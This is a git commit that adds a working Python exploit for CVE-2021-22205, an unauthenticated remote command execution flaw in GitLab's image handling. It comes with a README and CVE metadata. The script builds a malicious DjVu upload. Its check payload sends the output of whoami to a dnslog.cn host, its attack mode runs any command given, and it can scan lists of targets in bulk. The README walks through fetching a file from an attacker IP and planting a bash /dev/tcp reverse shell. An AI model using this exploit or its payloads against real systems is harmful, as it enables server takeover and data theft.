ADD CVE-2021-22205

2022-10-20 11:30:23 +08:00 · 2022-10-20 11:30:23 +08:00 · 7a5979ce70
parent 3fe7196065
commit 7a5979ce70
16 changed files with 242 additions and 0 deletions
--- a/cve/gitlab/2021/CVE-2021-22205/CVE-2021-22205.py
+++ b/cve/gitlab/2021/CVE-2021-22205/CVE-2021-22205.py
@ -0,0 +1,120 @@
+import requests
+from bs4 import BeautifulSoup
+import base64
+import random
+import sys
+import os
+import argparse
+
+requests.packages.urllib3.disable_warnings()
+
+def title():
+    print("""
+	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
+	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
+	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
+	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
+ 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
+
+ 	                                Author:Al1ex@Heptagram
+                                Github:https://github.com/Al1ex                             
+    	""")
+    print('''
+        验证模式：python CVE-2021-22205.py -v true -t target_url 
+        攻击模式：python CVE-2021-22205.py -a true -t target_url -c command 
+        批量检测：python CVE-2021-22205.py -s true -f file 
+        ''')    
+
+def check(target_url):
+    session = requests.Session()
+    try:
+        req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False)
+        soup = BeautifulSoup(req1.text, features="lxml")
+        token = soup.findAll('meta')[16].get("content")
+        data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
+        headers = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
+            "Connection": "close",
+            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
+            "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}
+        flag = 'Failed to process image'
+        req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
+        if flag in req2.text:
+            print("[+] 目标 {} 存在漏洞".format(target_url))
+        else:
+            print("[-] 目标 {} 不存在漏洞".format(target_url))
+    except Exception as e:
+        print(e)
+
+def attack(target_url,command):
+    session = requests.Session()
+    try:
+        req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False)
+        soup = BeautifulSoup(req1.text, features="lxml")
+        token = soup.findAll('meta')[16].get("content")
+        data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+  command +"} . \\\n\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
+        headers = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
+            "Connection": "close",
+            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
+            "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"}
+        flag = 'Failed to process image'
+        req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
+        if flag in req2.text:
+            print("[+] 目标 {} 存在漏洞".format(target_url))
+            print("[+] 请到dnslog或主机检查执行结果")
+        else:
+            print("[-] 目标 {} 不存在漏洞".format(target_url))
+    except Exception as e:
+        print(e)
+
+def scan(file):
+    for url_link in open(file, 'r', encoding='utf-8'):
+            if url_link.strip() != '':
+                url_path = format_url(url_link.strip())
+                check(url_path)
+
+def format_url(url):
+    try:
+        if url[:4] != "http":
+            url = "https://" + url
+            url = url.strip()
+        return url
+    except Exception as e:
+        print('URL 错误 {0}'.format(url))    
+
+def main():
+    parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
+    parser.add_argument('-v', '--verify', type=bool,help=' 验证模式 ')
+    parser.add_argument('-t', '--target', type=str, help=' 目标URL ')
+
+    parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ')
+    parser.add_argument('-c', '--command', type=str, help=' 执行命令 ')
+
+    parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
+    parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')
+
+
+    args = parser.parse_args()
+
+    verify_model = args.verify
+    target_url   = args.target
+
+    attack_model = args.attack
+    command = args.command
+
+    scan_model = args.scan
+    file = args.file
+
+    if verify_model is True and target_url !=None:
+        check(target_url)
+    elif attack_model is True and target_url != None and command != None:
+        attack(target_url,command)
+    elif scan_model is True and file != None:
+        scan(file)
+    else:
+        sys.exit(0)   
+
+if __name__ == '__main__':
+    title()
+    main()
--- a/cve/gitlab/2021/CVE-2021-22205/README.md
+++ b/cve/gitlab/2021/CVE-2021-22205/README.md
@ -0,0 +1,97 @@
+### Vuln Impact
+
+An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
+
+### Vuln Product
+
+- Gitlab CE/EE < 13.10.3
+- Gitlab CE/EE < 13.9.6
+- Gitlab CE/EE < 13.8.8
+
+### Environment
+
+```C
+export GITLAB_HOME=/srv/gitlab
+
+sudo docker run --detach \
+  --hostname gitlab.example.com \
+  --publish 443:443 --publish 80:80 \
+  --name gitlab \
+  --restart always \
+  --volume $GITLAB_HOME/config:/etc/gitlab \
+  --volume $GITLAB_HOME/logs:/var/log/gitlab \
+  --volume $GITLAB_HOME/data:/var/opt/gitlab \
+  gitlab/gitlab-ce:13.9.1-ce.0
+```
+
+### Vunl Check
+
+##### Basic usage
+
+```c
+python3 CVE-2021-2205.py
+```
+
+![img](img/usage.png)
+
+##### Vuln check
+
+```c
+python3 CVE-2021-2205.py -v true -t http://gitlab.example.com
+```
+
+![img](img/check.png)
+
+##### command execute
+
+```c
+python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"
+```
+
+![attack](img/attack.png)
+
+```c
+python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"
+```
+
+![attack_command1](img/attack_command1.png)
+
+![attack_command2](img/attack_command2.png)
+
+##### batch scan
+
+```
+python3 CVE-2021-2205.py -s true -f target.txt
+```
+
+![scan_result](img/scan_result.png)
+
+##### Reserve Shell
+
+```
+python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
+```
+
+![reverse_shell1](img/reverse_shell1.png)
+
+![reverse_shell2](img/reverse_shell2.png)
+
+```
+python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"
+```
+
+![reverse_shell3](img/reverse_shell3.png)
+
+![reverse_shell4](img/reverse_shell4.png)
+
+```
+python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"
+```
+
+![reverse_shell5](img/reverse_shell5.png)
+
+### Reference
+
+https://github.com/mr-r3bot/Gitlab-CVE-2021-22205
+
+https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
--- a/cve/gitlab/2021/CVE-2021-22205/img/attack.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/attack.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/attack_command1.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/attack_command1.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/attack_command2.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/attack_command2.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/check.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/check.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell1.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell1.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell2.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell2.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell3.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell3.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell4.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell4.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell5.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell5.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/scan_result.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/scan_result.png
--- a/cve/gitlab/2021/CVE-2021-22205/img/usage.png
+++ b/cve/gitlab/2021/CVE-2021-22205/img/usage.png
--- a/cve/gitlab/2021/CVE-2021-22205/target.txt
+++ b/cve/gitlab/2021/CVE-2021-22205/target.txt
@ -0,0 +1 @@
+http://gitlab.example.com/
--- a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml
+++ b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml
@ -0,0 +1,22 @@
+id: CVE-2021-22205
+source: https://github.com/Al1ex/CVE-2021-22205
+info:
+  name: GitLab是由GitLab Inc.开发，一款基于Git的完全集成的软件开发平台。
+  severity: critical
+  description: |
+    2021年4月14日Gitlab官方发布安全更新，披露了CVE-2021-22205 Gitlab exiftool 远程命令执行漏洞，攻击者通过上传恶意图片可触发远程命令执行，控制服务器。近期，互联网上披露CVE-2021-22205 Gitlab exiftool远程命令执行漏洞在野利用事件及其新型利用方式，由于Gitlab某些端点路径无需授权，攻击者可在无需认证的情况下完成图片上传，从而执行任意命令。
+  scope-of-influence:
+    11.9 <= GitLab（CE/EE）< 13.8.8
+    13.9 <= GitLab（CE/EE）< 13.9.6
+    13.10 <= GitLab（CE/EE）< 13.10.3
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2021-22205
+    cwe-id: CWE-94
+    cnvd-id: None
+    kve-id: None
+  tags: RCE,cve2021,gitlab
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@ -13,5 +13,7 @@ cve:
    - CVE-2022-2588
  sudo:
    - CVE-2021-3156
+  gitlab:
+    - CVE-2021-22205
 cnvd:
 kve: